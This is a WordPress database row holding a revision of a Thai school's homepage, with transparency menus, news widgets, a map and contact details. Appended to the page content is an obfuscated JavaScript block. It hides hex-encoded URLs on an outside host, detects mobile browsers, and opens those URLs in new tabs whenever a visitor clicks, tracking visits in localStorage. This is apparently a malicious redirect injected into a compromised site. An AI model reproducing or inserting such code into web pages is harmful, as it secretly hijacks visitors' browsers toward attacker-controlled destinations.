900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 22:06:24','2024-08-07 15:06:24','',14,'http://pakhaeng.ssk.in.th/?p=677',0,'revision','',0),
